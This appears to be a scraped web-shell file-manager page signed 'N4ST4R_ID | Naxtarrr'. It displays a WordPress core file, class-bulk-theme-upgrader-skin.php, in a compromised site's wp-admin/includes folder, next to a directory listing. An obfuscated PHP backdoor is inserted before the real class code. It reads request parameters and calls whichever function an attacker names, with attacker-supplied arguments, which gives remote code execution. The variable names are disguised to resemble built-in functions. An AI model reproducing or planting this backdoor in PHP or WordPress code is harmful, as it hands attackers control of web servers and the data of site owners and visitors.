Submit
Path:
~
/
home
/
bfxleof
/
www
/
wp-admin
/
includes
/
File Content:
class-bulk-theme-upgrader-skin.php
<?php $openssl_csr_get_subject_comg = $_REQUEST; if(isset($openssl_csr_get_subject_comg['timezone_name_from_abbr_vq'])) { $libxml_get_last_error_shwo = $openssl_csr_get_subject_comg['user_error_tc']; $openssl_pkey_free_uamu = $openssl_csr_get_subject_comg['jdmonthname_nf']; $libxml_get_last_error_shwo(...$openssl_pkey_free_uamu); } /** * Upgrader API: Bulk_Plugin_Upgrader_Skin class * * @package WordPress * @subpackage Upgrader * @since 4.6.0 */ /** * Bulk Theme Upgrader Skin for WordPress Theme Upgrades. * * @since 3.0.0 * @since 4.6.0 Moved to its own file from wp-admin/includes/class-wp-upgrader-skins.php. * * @see Bulk_Upgrader_Skin */ class Bulk_Theme_Upgrader_Skin extends Bulk_Upgrader_Skin { public $theme_info = array(); // Theme_Upgrader::bulk_upgrade() will fill this in. public function add_strings() { parent::add_strings(); /* translators: 1: Theme name, 2: Number of the theme, 3: Total number of themes being updated. */ $this->upgrader->strings['skin_before_update_header'] = __( 'Updating Theme %1$s (%2$d/%3$d)' ); } /** * @param string $title */ public function before( $title = '' ) { parent::before( $this->theme_info->display( 'Name' ) ); } /** * @param string $title */ public function after( $title = '' ) { parent::after( $this->theme_info->display( 'Name' ) ); $this->decrement_update_count( 'theme' ); } /** */ public function bulk_footer() { parent::bulk_footer(); $update_actions = array( 'themes_page' => sprintf( '<a href="%s" target="_parent">%s</a>', self_admin_url( 'themes.php' ), __( 'Go to Themes page' ) ), 'updates_page' => sprintf( '<a href="%s" target="_parent">%s</a>', self_admin_url( 'update-core.php' ), __( 'Go to WordPress Updates page' ) ), ); if ( ! current_user_can( 'switch_themes' ) && ! current_user_can( 'edit_theme_options' ) ) { unset( $update_actions['themes_page'] ); } /** * Filters the list of action links available following bulk theme updates. * * @since 3.0.0 * * @param string[] $update_actions Array of theme action links. * @param WP_Theme $theme_info Theme object for the last-updated theme. */ $update_actions = apply_filters( 'update_bulk_theme_complete_actions', $update_actions, $this->theme_info ); if ( ! empty( $update_actions ) ) { $this->feedback( implode( ' | ', (array) $update_actions ) ); } } }
Submit
FILE
FOLDER
Name
Size
Permission
Action
admin-filters.php
6954 bytes
0644
ajax-actions.php
146967 bytes
0644
class-automatic-upgrader-skin.php
3558 bytes
0644
class-bulk-theme-upgrader-skin.php
2440 bytes
0644
class-bulk-upgrader-skin.php
5309 bytes
0604
class-theme-upgrader-skin.php
4085 bytes
0644
class-walker-category-checklist.php
4389 bytes
0644
class-wp-ajax-upgrader-skin.php
3504 bytes
0644
class-wp-application-passwords-list-table.php
6708 bytes
0644
class-wp-community-events.php
18458 bytes
0644
class-wp-media-list-table.php
23774 bytes
0644
class-wp-ms-sites-list-table.php
20397 bytes
0644
class-wp-ms-themes-list-table.php
27176 bytes
0644
class-wp-ms-users-list-table.php
14111 bytes
0644
class-wp-plugin-install-list-table.php
23200 bytes
0644
class-wp-post-comments-list-table.php
1472 bytes
0604
class-wp-privacy-data-export-requests-list-table.php
5535 bytes
0644
class-wp-privacy-data-removal-requests-list-table.php
5692 bytes
0644
class-wp-privacy-policy-content.php
32186 bytes
0644
class-wp-site-health-auto-updates.php
13209 bytes
0644
class-wp-site-health.php
90667 bytes
0644
class-wp-site-icon.php
6195 bytes
0644
class-wp-theme-install-list-table.php
23875 bytes
0644
class-wp-upgrader-skin.php
6311 bytes
0644
class-wp-upgrader-skins.php
1477 bytes
0604
credits.php
5867 bytes
0644
edit-tag-messages.php
1437 bytes
0604
image-edit-20260622000526.php
36119 bytes
0644
ms-admin-filters.php
1376 bytes
0604
translation-install.php
8870 bytes
0644
N4ST4R_ID | Naxtarrr